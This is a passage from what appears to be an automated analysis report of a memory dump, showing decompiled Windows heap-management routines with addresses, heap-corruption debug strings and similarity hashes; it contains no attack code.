                                                                                                                          											 *_t414 =  *_t394;
                                                                                                                          											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										_t207 = E009EA229(_t307, _t420);
                                                                                                                          										__eflags = _t207;
                                                                                                                          										if(_t207 != 0) {
                                                                                                                          											goto L107;
                                                                                                                          										}
                                                                                                                          										E009EA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									_t342 =  *_t420 & 0x0000ffff;
                                                                                                                          									while(1) {
                                                                                                                          										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                                                                                                          										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										_t210 =  *_t393;
                                                                                                                          										__eflags = _t210;
                                                                                                                          										if(_t210 == 0) {
                                                                                                                          											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                                                                          											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                                                                          											L103:
                                                                                                                          											_t146 =  &(_t420[2]); // -16
                                                                                                                          											E009EBC04(_t307, _t393, 1, _t146, _t212, _t342);
                                                                                                                          											goto L104;
                                                                                                                          										}
                                                                                                                          										_t393 = _t210;
                                                                                                                          									}
                                                                                                                          									_t212 = _t342;
                                                                                                                          									goto L103;
                                                                                                                          								} else {
                                                                                                                          									_t384 = _t414[6];
                                                                                                                          									_t102 =  &(_t414[4]); // -16
                                                                                                                          									_t311 = _t102;
                                                                                                                          									_t215 =  *_t311;
                                                                                                                          									_v20 = _t215;
                                                                                                                          									_v16 = _t384;
                                                                                                                          									_t216 =  *((intOrPtr*)(_t215 + 4));
                                                                                                                          									__eflags =  *_t384 - _t216;
                                                                                                                          									if( *_t384 != _t216) {
                                                                                                                          										L92:
                                                                                                                          										_push(_t311);
                                                                                                                          										_push( *_t384);
                                                                                                                          										E00A8A80D(_t307, 0xd, _t311, _t216);
                                                                                                                          										L93:
                                                                                                                          										_v5 = 0;
                                                                                                                          										goto L94;
                                                                                                                          									}
                                                                                                                          									__eflags =  *_t384 - _t311;
                                                                                                                          									if( *_t384 != _t311) {
                                                                                                                          										goto L92;
                                                                                                                          									}
                                                                                                                          									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                                                                          									_t386 =  *(_t307 + 0xb4);
                                                                                                                          									__eflags = _t386;
                                                                                                                          									if(_t386 == 0) {
                                                                                                                          										L79:
                                                                                                                          										_t313 = _v16;
                                                                                                                          										_t219 = _v20;
                                                                                                                          										 *_t313 = _t219;
                                                                                                                          										 *(_t219 + 4) = _t313;
                                                                                                                          										__eflags = _t414[1] & 0x00000008;
                                                                                                                          										if((_t414[1] & 0x00000008) == 0) {
                                                                                                                          											L82:
                                                                                                                          											_t314 = _t414[1];
                                                                                                                          											__eflags = _t314 & 0x00000004;
                                                                                                                          											if((_t314 & 0x00000004) != 0) {
                                                                                                                          												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                                                                          												_v12 = _t221;
                                                                                                                          												__eflags = _t314 & 0x00000002;
                                                                                                                          												if((_t314 & 0x00000002) != 0) {
                                                                                                                          													__eflags = _t221 - 4;
                                                                                                                          													if(_t221 > 4) {
                                                                                                                          														_t221 = _t221 - 4;
                                                                                                                          														__eflags = _t221;
                                                                                                                          														_v12 = _t221;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												_t127 =  &(_t414[8]); // -8
                                                                                                                          												_t222 = E00A1D540(_t127, _t221, 0xfeeefeee);
                                                                                                                          												_v20 = _t222;
                                                                                                                          												__eflags = _t222 - _v12;
                                                                                                                          												if(_t222 != _v12) {
                                                                                                                          													_t316 =  *[fs:0x30];
                                                                                                                          													__eflags =  *(_t316 + 0xc);
                                                                                                                          													if( *(_t316 + 0xc) == 0) {
                                                                                                                          														_push("HEAP: ");
                                                                                                                          														E009CB150();
                                                                                                                          													} else {
                                                                                                                          														E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          													}
                                                                                                                          													_push(_v20 + 0x10 + _t414);
                                                                                                                          													E009CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                                                                          													_t228 =  *[fs:0x30];
                                                                                                                          													_t421 = _t421 + 0xc;
                                                                                                                          													__eflags =  *((char*)(_t228 + 2));
                                                                                                                          													if( *((char*)(_t228 + 2)) != 0) {
                                                                                                                          														 *0xab6378 = 1;
                                                                                                                          														asm("int3");
                                                                                                                          														 *0xab6378 = 0;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											goto L93;
                                                                                                                          										}
                                                                                                                          										_t232 = E009EA229(_t307, _t414);
                                                                                                                          										__eflags = _t232;
                                                                                                                          										if(_t232 != 0) {
                                                                                                                          											goto L82;
                                                                                                                          										}
                                                                                                                          										E009EA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                                                                          										goto L93;
                                                                                                                          									}
                                                                                                                          									_t323 =  *_t414 & 0x0000ffff;
                                                                                                                          									while(1) {
                                                                                                                          										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                                                                                                          										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										_t235 =  *_t386;
                                                                                                                          										__eflags = _t235;
                                                                                                                          										if(_t235 == 0) {
                                                                                                                          											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                                                                          											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                                                                          											L78:
                                                                                                                          											_t111 =  &(_t414[4]); // -16
                                                                                                                          											E009EBC04(_t307, _t386, 1, _t111, _t237, _t323);
                                                                                                                          											goto L79;
                                                                                                                          										}
                                                                                                                          										_t386 = _t235;
                                                                                                                          									}
                                                                                                                          									_t237 = _t323;
                                                                                                                          									goto L78;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							return _t414;
                                                                                                                          						}
                                                                                                                          						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                                                                                                          						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                                                                                                          						if(_t398 >> 0x18 != _t347) {
                                                                                                                          							_push(_t347);
                                                                                                                          							_push(0);
                                                                                                                          							_push(0);
                                                                                                                          							_push(_t420);
                                                                                                                          							_push(3);
                                                                                                                          							goto L64;
                                                                                                                          						}
                                                                                                                          						goto L6;
                                                                                                                          					} else {
                                                                                                                          						_t277 =  *_t419 & 0x0000ffff;
                                                                                                                          						_v16 = _t277;
                                                                                                                          						while(1) {
                                                                                                                          							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                                                                                                          							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_t279 =  *_t404;
                                                                                                                          							__eflags = _t279;
                                                                                                                          							if(_t279 == 0) {
                                                                                                                          								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                                                                          								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                                                                          								break;
                                                                                                                          							} else {
                                                                                                                          								_t404 = _t279;
                                                                                                                          								_t277 =  *_t419 & 0x0000ffff;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						E009EBC04(_t307, _t404, 1, _t350, _t277, _v16);
                                                                                                                          						goto L20;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          0x00a31471
                                                                                                                          0x00a31474
                                                                                                                          0x00a31477
                                                                                                                          0x00a31479
                                                                                                                          0x00a3159c
                                                                                                                          0x00a3159c
                                                                                                                          0x00a3159d
                                                                                                                          0x00a315a6
                                                                                                                          0x00a315ab
                                                                                                                          0x00a315ab
                                                                                                                          0x00000000
                                                                                                                          0x00a315ab
                                                                                                                          0x00a3147f
                                                                                                                          0x00a31481
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a3148a
                                                                                                                          0x00a3148d
                                                                                                                          0x00a31493
                                                                                                                          0x00a31495
                                                                                                                          0x00a314c0
                                                                                                                          0x00a314c0
                                                                                                                          0x00a314c3
                                                                                                                          0x00a314c6
                                                                                                                          0x00a314c8
                                                                                                                          0x00a314cb
                                                                                                                          0x00a314cf
                                                                                                                          0x00a314f2
                                                                                                                          0x00a314f2
                                                                                                                          0x00a314f5
                                                                                                                          0x00a314f8
                                                                                                                          0x00a31501
                                                                                                                          0x00a31508
                                                                                                                          0x00a3150b
                                                                                                                          0x00a3150e
                                                                                                                          0x00a31510
                                                                                                                          0x00a31513
                                                                                                                          0x00a31515
                                                                                                                          0x00a31515
                                                                                                                          0x00a31518
                                                                                                                          0x00a31518
                                                                                                                          0x00a31513
                                                                                                                          0x00a31521
                                                                                                                          0x00a31525
                                                                                                                          0x00a3152a
                                                                                                                          0x00a3152d
                                                                                                                          0x00a31530
                                                                                                                          0x00a31532
                                                                                                                          0x00a31539
                                                                                                                          0x00a3153d
                                                                                                                          0x00a3155d
                                                                                                                          0x00a31562
                                                                                                                          0x00a3153f
                                                                                                                          0x00a31555
                                                                                                                          0x00a3155a
                                                                                                                          0x00a31570
                                                                                                                          0x00a31577
                                                                                                                          0x00a3157c
                                                                                                                          0x00a31582
                                                                                                                          0x00a31585
                                                                                                                          0x00a31589
                                                                                                                          0x00a3158b
                                                                                                                          0x00a31592
                                                                                                                          0x00a31593
                                                                                                                          0x00a31593
                                                                                                                          0x00a31589
                                                                                                                          0x00a31530
                                                                                                                          0x00000000
                                                                                                                          0x00a314f8
                                                                                                                          0x00a314d5
                                                                                                                          0x00a314da
                                                                                                                          0x00a314dc
                                                                                                                          0x00000000
                                                                                                                          0x00a314de
                                                                                                                          0x00a314e8
                                                                                                                          0x00000000
                                                                                                                          0x00a314e8
                                                                                                                          0x00a31497
                                                                                                                          0x00a31497
                                                                                                                          0x00a314a4
                                                                                                                          0x00a314a4
                                                                                                                          0x00a314a7
                                                                                                                          0x00a314a9
                                                                                                                          0x00a314ab
                                                                                                                          0x00a314ab
                                                                                                                          0x00a3149c
                                                                                                                          0x00a3149e
                                                                                                                          0x00a314a0
                                                                                                                          0x00a314b0
                                                                                                                          0x00a314b0
                                                                                                                          0x00000000
                                                                                                                          0x00a314a2
                                                                                                                          0x00a314a2
                                                                                                                          0x00000000
                                                                                                                          0x00a314a2
                                                                                                                          0x00a314a0
                                                                                                                          0x00a314b3
                                                                                                                          0x00a314bb
                                                                                                                          0x00000000
                                                                                                                          0x00a314bb
                                                                                                                          0x00a31495
                                                                                                                          0x009e9a7c
                                                                                                                          0x009e9a7c
                                                                                                                          0x009e9a7f
                                                                                                                          0x009e9a7f
                                                                                                                          0x009e9a82
                                                                                                                          0x009e9a84
                                                                                                                          0x009e9a87
                                                                                                                          0x009e9a8a
                                                                                                                          0x009e9a8d
                                                                                                                          0x009e9a8f
                                                                                                                          0x00a3166a
                                                                                                                          0x00a3166a
                                                                                                                          0x00a3166b
                                                                                                                          0x00a31674
                                                                                                                          0x00000000
                                                                                                                          0x00a31674
                                                                                                                          0x009e9a95
                                                                                                                          0x009e9a97
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009e9aa0
                                                                                                                          0x009e9aa3
                                                                                                                          0x009e9aa9
                                                                                                                          0x009e9aab
                                                                                                                          0x009e9ad7
                                                                                                                          0x009e9ad7
                                                                                                                          0x009e9ada
                                                                                                                          0x009e9add
                                                                                                                          0x009e9adf
                                                                                                                          0x009e9ae2
                                                                                                                          0x009e9ae6
                                                                                                                          0x009e9b22
                                                                                                                          0x009e9b27
                                                                                                                          0x009e9b29
                                                                                                                          0x00000000
                                                                                                                          0x009e9b2b
                                                                                                                          0x00a315be
                                                                                                                          0x00000000
                                                                                                                          0x00a315be
                                                                                                                          0x009e9b29
                                                                                                                          0x009e9ae8
                                                                                                                          0x009e9ae8
                                                                                                                          0x009e9aeb
                                                                                                                          0x009e9aee
                                                                                                                          0x00a315cb
                                                                                                                          0x00a315d2
                                                                                                                          0x00a315d5
                                                                                                                          0x00a315d7
                                                                                                                          0x00a315da
                                                                                                                          0x00a315dc
                                                                                                                          0x00a315dc
                                                                                                                          0x00a315dc
                                                                                                                          0x00a315da
                                                                                                                          0x00a315e5
                                                                                                                          0x00a315e9
                                                                                                                          0x00a315ee
                                                                                                                          0x00a315f1
                                                                                                                          0x00a315f3
                                                                                                                          0x00a315f9
                                                                                                                          0x00a31600
                                                                                                                          0x00a31604
                                                                                                                          0x00a31624
                                                                                                                          0x00a31629
                                                                                                                          0x00a31606
                                                                                                                          0x00a3161c
                                                                                                                          0x00a31621
                                                                                                                          0x00a31637
                                                                                                                          0x00a3163e
                                                                                                                          0x00a31643
                                                                                                                          0x00a31649
                                                                                                                          0x00a3164c
                                                                                                                          0x00a31650
                                                                                                                          0x00a31656
                                                                                                                          0x00a3165d
                                                                                                                          0x00a3165e
                                                                                                                          0x00a3165e
                                                                                                                          0x00a31650
                                                                                                                          0x00a315f3
                                                                                                                          0x009e9af4
                                                                                                                          0x009e9af7
                                                                                                                          0x009e9afc
                                                                                                                          0x009e9b00
                                                                                                                          0x009e9b04
                                                                                                                          0x009e9b08
                                                                                                                          0x009e9b14
                                                                                                                          0x009e99fe
                                                                                                                          0x009e9a04
                                                                                                                          0x009e9a07
                                                                                                                          0x00000000
                                                                                                                          0x009e9a29
                                                                                                                          0x00a3169c
                                                                                                                          0x00a316a0
                                                                                                                          0x00a316a5
                                                                                                                          0x00a316a9
                                                                                                                          0x00a316b5
                                                                                                                          0x00a316ba
                                                                                                                          0x00a316bc
                                                                                                                          0x00a316be
                                                                                                                          0x00a316c3
                                                                                                                          0x00a316c3
                                                                                                                          0x00a316bc
                                                                                                                          0x00a316c8
                                                                                                                          0x00a316cc
                                                                                                                          0x00a3181b
                                                                                                                          0x00a3181b
                                                                                                                          0x00a3181e
                                                                                                                          0x00a3181e
                                                                                                                          0x00a31821

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                          • API String ID: 0-3178619729
                                                                                                                          • Opcode ID: f2472bad66de530ab173a01c5a54f318105dc8945ccd38de4a60f94700dc1208
                                                                                                                          • Instruction ID: 73db6e83a7e0b8e2020fd41147e0fad6a147a801e7f73a7599fc03da64c2d9af
                                                                                                                          • Opcode Fuzzy Hash: f2472bad66de530ab173a01c5a54f318105dc8945ccd38de4a60f94700dc1208
                                                                                                                          • Instruction Fuzzy Hash: 9722F070A002419FDB25CF69C896B7ABBF5EF85704F288569F4468B382E735EC85CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 67%
                                                                                                                          			E009EB477(signed int __ecx, signed int* __edx) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				intOrPtr* _v16;
                                                                                                                          				signed int* _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				char _v28;
                                                                                                                          				signed int _v44;
                                                                                                                          				char _v48;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* __ebp;
                                                                                                                          				signed int _t131;
                                                                                                                          				signed char _t134;
                                                                                                                          				signed int _t139;
                                                                                                                          				void* _t141;
                                                                                                                          				signed int* _t143;
                                                                                                                          				signed int* _t144;
                                                                                                                          				intOrPtr* _t147;
                                                                                                                          				char _t160;
                                                                                                                          				signed int* _t163;
                                                                                                                          				signed char* _t164;
                                                                                                                          				intOrPtr _t165;
                                                                                                                          				signed int* _t167;
                                                                                                                          				signed char* _t168;
                                                                                                                          				intOrPtr _t193;
                                                                                                                          				intOrPtr* _t195;
                                                                                                                          				signed int _t203;
                                                                                                                          				signed int _t209;
                                                                                                                          				signed int _t211;
                                                                                                                          				intOrPtr _t214;
                                                                                                                          				intOrPtr* _t231;
                                                                                                                          				intOrPtr* _t236;
                                                                                                                          				signed int _t237;
                                                                                                                          				intOrPtr* _t238;
                                                                                                                          				signed int _t240;
                                                                                                                          				intOrPtr _t241;
                                                                                                                          				char _t243;
                                                                                                                          				signed int _t252;
                                                                                                                          				signed int _t254;
                                                                                                                          				signed char _t259;
                                                                                                                          				signed int _t264;
                                                                                                                          				signed int _t268;
                                                                                                                          				intOrPtr _t277;
                                                                                                                          				unsigned int _t279;
                                                                                                                          				signed int* _t283;
                                                                                                                          				intOrPtr* _t284;
                                                                                                                          				unsigned int _t287;
                                                                                                                          				signed int _t291;
                                                                                                                          				signed int _t293;
                                                                                                                          
                                                                                                                          				_v8 =  *0xabd360 ^ _t293;
                                                                                                                          				_t223 = __edx;
                                                                                                                          				_v20 = __edx;
                                                                                                                          				_t291 = __ecx;
                                                                                                                          				_t276 =  *__edx;
                                                                                                                          				_t231 = E009EB8E4( *__edx);
                                                                                                                          				_t292 = __ecx + 0x8c;
                                                                                                                          				_v16 = _t231;
                                                                                                                          				if(_t231 == __ecx + 0x8c) {
                                                                                                                          					L38:
                                                                                                                          					_t131 = 0;
                                                                                                                          					L34:
                                                                                                                          					return E00A0B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
                                                                                                                          				}
                                                                                                                          				if( *0xab8748 >= 1) {
                                                                                                                          					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
                                                                                                                          					if(__eflags < 0) {
                                                                                                                          						_t214 =  *[fs:0x30];
                                                                                                                          						__eflags =  *(_t214 + 0xc);
                                                                                                                          						if( *(_t214 + 0xc) == 0) {
                                                                                                                          							_push("HEAP: ");
                                                                                                                          							E009CB150();
                                                                                                                          						} else {
                                                                                                                          							E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          						}
                                                                                                                          						_push("(UCRBlock->Size >= *Size)");
                                                                                                                          						E009CB150();
                                                                                                                          						__eflags =  *0xab7bc8;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							__eflags = 1;
                                                                                                                          							E00A82073(_t223, 1, _t291, 1);
                                                                                                                          						}
                                                                                                                          						_t231 = _v16;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t5 = _t231 - 8; // -8
                                                                                                                          				_t292 = _t5;
                                                                                                                          				_t134 =  *((intOrPtr*)(_t292 + 6));
                                                                                                                          				if(_t134 != 0) {
                                                                                                                          					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                                          				} else {
                                                                                                                          					_t223 = _t291;
                                                                                                                          				}
                                                                                                                          				_t276 = _v20;
                                                                                                                          				_v28 =  *((intOrPtr*)(_t231 + 0x10));
                                                                                                                          				_t139 =  *(_t291 + 0xcc) ^  *0xab8a68;
                                                                                                                          				_v12 = _t139;
                                                                                                                          				if(_t139 != 0) {
                                                                                                                          					 *0xabb1e0(_t291,  &_v28, _t276);
                                                                                                                          					_t141 = _v12();
                                                                                                                          					goto L8;
                                                                                                                          				} else {
                                                                                                                          					_t203 =  *((intOrPtr*)(_t231 + 0x14));
                                                                                                                          					_v12 = _t203;
                                                                                                                          					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
                                                                                                                          						_t264 = _v12;
                                                                                                                          						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
                                                                                                                          						if(__eflags < 0) {
                                                                                                                          							 *_t276 = _t264;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t209 =  *(_t291 + 0x40) & 0x00040000;
                                                                                                                          					asm("sbb ecx, ecx");
                                                                                                                          					_t268 = ( ~_t209 & 0x0000003c) + 4;
                                                                                                                          					_v12 = _t268;
                                                                                                                          					if(_t209 != 0) {
                                                                                                                          						_push(0);
                                                                                                                          						_push(0x14);
                                                                                                                          						_push( &_v48);
                                                                                                                          						_push(3);
                                                                                                                          						_push(_t291);
                                                                                                                          						_push(0xffffffff);
                                                                                                                          						_t211 = E00A09730();
                                                                                                                          						__eflags = _t211;
                                                                                                                          						if(_t211 < 0) {
                                                                                                                          							L56:
                                                                                                                          							_push(_t268);
                                                                                                                          							_t276 = _t291;
                                                                                                                          							E00A8A80D(_t291, 1, _v44, 0);
                                                                                                                          							_t268 = 4;
                                                                                                                          							goto L7;
                                                                                                                          						}
                                                                                                                          						__eflags = _v44 & 0x00000060;
                                                                                                                          						if((_v44 & 0x00000060) == 0) {
                                                                                                                          							goto L56;
                                                                                                                          						}
                                                                                                                          						__eflags = _v48 - _t291;
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							goto L56;
                                                                                                                          						}
                                                                                                                          						_t268 = _v12;
                                                                                                                          					}
                                                                                                                          					L7:
                                                                                                                          					_push(_t268);
                                                                                                                          					_push(0x1000);
                                                                                                                          					_push(_v20);
                                                                                                                          					_push(0);
                                                                                                                          					_push( &_v28);
                                                                                                                          					_push(0xffffffff);
                                                                                                                          					_t141 = E00A09660();
                                                                                                                          					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
                                                                                                                          					L8:
                                                                                                                          					if(_t141 < 0) {
                                                                                                                          						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
                                                                                                                          						goto L38;
                                                                                                                          					}
                                                                                                                          					_t143 =  *( *[fs:0x30] + 0x50);
                                                                                                                          					if(_t143 != 0) {
                                                                                                                          						__eflags =  *_t143;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							goto L10;
                                                                                                                          						}
                                                                                                                          						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                                          						L11:
                                                                                                                          						if( *_t144 != 0) {
                                                                                                                          							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								E00A8138A(_t223, _t291, _v28,  *_v20, 2);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
                                                                                                                          							_t287 =  *(_t291 + 0x50) ^  *_t292;
                                                                                                                          							 *_t292 = _t287;
                                                                                                                          							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
                                                                                                                          							if(_t287 >> 0x18 != _t259) {
                                                                                                                          								_push(_t259);
                                                                                                                          								E00A7FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t147 = _v16 + 8;
                                                                                                                          						 *((char*)(_t292 + 2)) = 0;
                                                                                                                          						 *((char*)(_t292 + 7)) = 0;
                                                                                                                          						_t236 =  *((intOrPtr*)(_t147 + 4));
                                                                                                                          						_t277 =  *_t147;
                                                                                                                          						_v24 = _t236;
                                                                                                                          						_t237 =  *_t236;
                                                                                                                          						_v12 = _t237;
                                                                                                                          						_t238 = _v16;
                                                                                                                          						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
                                                                                                                          							_push(_t238);
                                                                                                                          							_push(_v12);
                                                                                                                          							E00A8A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
                                                                                                                          							_t238 = _v16;
                                                                                                                          						} else {
                                                                                                                          							_t195 = _v24;
                                                                                                                          							 *_t195 = _t277;
                                                                                                                          							 *((intOrPtr*)(_t277 + 4)) = _t195;
                                                                                                                          						}
                                                                                                                          						if( *(_t238 + 0x14) == 0) {
                                                                                                                          							L22:
                                                                                                                          							_t223[0x30] = _t223[0x30] - 1;
                                                                                                                          							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
                                                                                                                          							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
                                                                                                                          							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
                                                                                                                          							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
                                                                                                                          							_t279 =  *(_t238 + 0x14);
                                                                                                                          							if(_t279 >= 0x7f000) {
                                                                                                                          								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
                                                                                                                          								_t279 =  *(_t238 + 0x14);
                                                                                                                          							}
                                                                                                                          							_t152 = _v20;
                                                                                                                          							_t240 =  *_v20;
                                                                                                                          							_v12 = _t240;
                                                                                                                          							_t241 = _v16;
                                                                                                                          							if(_t279 <= _t240) {
                                                                                                                          								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
                                                                                                                          								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
                                                                                                                          									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
                                                                                                                          									L26:
                                                                                                                          									_t243 = 0;
                                                                                                                          									 *((char*)(_t292 + 3)) = 0;
                                                                                                                          									_t276 = _t223[0x18];
                                                                                                                          									if(_t223[0x18] != _t223) {
                                                                                                                          										_t160 = (_t292 - _t223 >> 0x10) + 1;
                                                                                                                          										_v24 = _t160;
                                                                                                                          										__eflags = _t160 - 0xfe;
                                                                                                                          										if(_t160 >= 0xfe) {
                                                                                                                          											_push(0);
                                                                                                                          											_push(0);
                                                                                                                          											E00A8A80D(_t276, 3, _t292, _t223);
                                                                                                                          											_t160 = _v24;
                                                                                                                          										}
                                                                                                                          										_t243 = _t160;
                                                                                                                          									}
                                                                                                                          									 *((char*)(_t292 + 6)) = _t243;
                                                                                                                          									_t163 =  *( *[fs:0x30] + 0x50);
                                                                                                                          									if(_t163 != 0) {
                                                                                                                          										__eflags =  *_t163;
                                                                                                                          										if( *_t163 == 0) {
                                                                                                                          											goto L28;
                                                                                                                          										}
                                                                                                                          										_t227 = 0x7ffe0380;
                                                                                                                          										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                                          										goto L29;
                                                                                                                          									} else {
                                                                                                                          										L28:
                                                                                                                          										_t227 = 0x7ffe0380;
                                                                                                                          										_t164 = 0x7ffe0380;
                                                                                                                          										L29:
                                                                                                                          										if( *_t164 != 0) {
                                                                                                                          											_t165 =  *[fs:0x30];
                                                                                                                          											__eflags =  *(_t165 + 0x240) & 0x00000001;
                                                                                                                          											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
                                                                                                                          												__eflags = E009E7D50();
                                                                                                                          												if(__eflags != 0) {
                                                                                                                          													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                                          													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                                          												}
                                                                                                                          												_t276 = _t292;
                                                                                                                          												E00A81582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										_t223 = 0x7ffe038a;
                                                                                                                          										_t167 =  *( *[fs:0x30] + 0x50);
                                                                                                                          										if(_t167 != 0) {
                                                                                                                          											__eflags =  *_t167;
                                                                                                                          											if( *_t167 == 0) {
                                                                                                                          												goto L31;
                                                                                                                          											}
                                                                                                                          											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                                                                          											goto L32;
                                                                                                                          										} else {
                                                                                                                          											L31:
                                                                                                                          											_t168 = _t223;
                                                                                                                          											L32:
                                                                                                                          											if( *_t168 != 0) {
                                                                                                                          												__eflags = E009E7D50();
                                                                                                                          												if(__eflags != 0) {
                                                                                                                          													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                                                                          													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                                                                          												}
                                                                                                                          												_t276 = _t292;
                                                                                                                          												E00A81582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
                                                                                                                          											}
                                                                                                                          											_t131 = _t292;
                                                                                                                          											goto L34;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								_t152 = _v20;
                                                                                                                          							}
                                                                                                                          							E009EB73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
                                                                                                                          							 *_v20 =  *_v20 << 3;
                                                                                                                          							goto L26;
                                                                                                                          						} else {
                                                                                                                          							_t283 =  *(_t291 + 0xb8);
                                                                                                                          							if(_t283 != 0) {
                                                                                                                          								_t190 =  *(_t238 + 0x14) >> 0xc;
                                                                                                                          								while(1) {
                                                                                                                          									__eflags = _t190 - _t283[1];
                                                                                                                          									if(_t190 < _t283[1]) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									_t252 =  *_t283;
                                                                                                                          									__eflags = _t252;
                                                                                                                          									_v24 = _t252;
                                                                                                                          									_t238 = _v16;
                                                                                                                          									if(_t252 == 0) {
                                                                                                                          										_t190 = _t283[1] - 1;
                                                                                                                          										__eflags = _t283[1] - 1;
                                                                                                                          										L70:
                                                                                                                          										E009EBC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
                                                                                                                          										_t238 = _v16;
                                                                                                                          										goto L19;
